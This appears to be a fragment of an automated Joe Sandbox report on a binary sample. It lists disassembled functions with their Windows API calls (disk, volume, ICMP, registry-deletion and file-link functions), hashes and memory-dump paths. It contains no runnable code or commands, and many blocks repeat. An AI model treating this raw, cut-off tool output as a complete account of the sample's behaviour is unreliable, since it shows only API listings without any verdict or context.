                                                            • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                            • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                            • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                            • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                            • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: \VH
                                                            • API String ID: 2507767853-234962358
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: \VH
                                                            • API String ID: 2507767853-234962358
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                            • String ID: crts
                                                            • API String ID: 943502515-3724388283
                                                            APIs
                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                            • CoInitialize.OLE32(00000000), ref: 0046E505
                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                            • CoUninitialize.OLE32 ref: 0046E53D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                            • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                            • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$LabelVolume
                                                            • String ID: \VH
                                                            • API String ID: 2006950084-234962358
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetMenuItemInfoW.USER32 ref: 00449727
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                            • DrawMenuBar.USER32 ref: 00449761
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                            • String ID: 0
                                                            • API String ID: 772068139-4108050209
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcscpy
                                                            • String ID: 3, 3, 8, 1
                                                            • API String ID: 3469035223-357260408
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                            • API String ID: 2574300362-3530519716
                                                            • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                            • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                            • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                            • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                            • API String ID: 2574300362-275556492
                                                            • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                            • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                            • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                            • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                            • API String ID: 2574300362-58917771
                                                            • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                            • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                            • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                            • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                            • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                            • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                            • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                            • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                            • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                            • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                            • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                            • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                            • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0047950F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                            • VariantClear.OLEAUT32(?), ref: 00479650
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                            • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                            • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                            • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                            APIs
                                                            • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                            • __itow.LIBCMT ref: 004699CD
                                                              • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                            • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                            • __itow.LIBCMT ref: 00469A97
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • API String ID: 3379773720-0
                                                            • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                            • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                            • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                            • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                            • ScreenToClient.USER32(?,?), ref: 00449A80
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                            • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                            • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                            • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                            • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                            • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                            • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                            APIs
                                                            • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                            • GetWindowRect.USER32(?,?), ref: 00441722
                                                            • PtInRect.USER32(?,?,?), ref: 00441734
                                                            • MessageBeep.USER32(00000000), ref: 004417AD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                            • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                            • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                            • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
